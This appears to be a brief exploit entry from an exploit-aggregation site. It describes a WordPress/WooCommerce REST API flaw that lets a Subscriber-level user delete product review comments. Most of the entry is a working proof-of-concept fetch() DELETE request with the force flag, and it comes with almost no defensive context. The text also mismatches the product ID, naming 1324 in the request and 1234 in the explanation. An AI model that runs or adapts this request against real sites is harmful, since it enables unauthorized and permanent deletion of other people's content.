## https://sploitus.com/exploit?id=WPEX-ID:B76DBF37-A0A2-48CF-BD85-3EBBC2F394DD
Log in as any user (with privileges as low as Subscriber).
fetch("https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force=1", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "DELETE",
"credentials": "include"
});
That needs product 1234 to not exist. It will permanently remove comment with ID 2.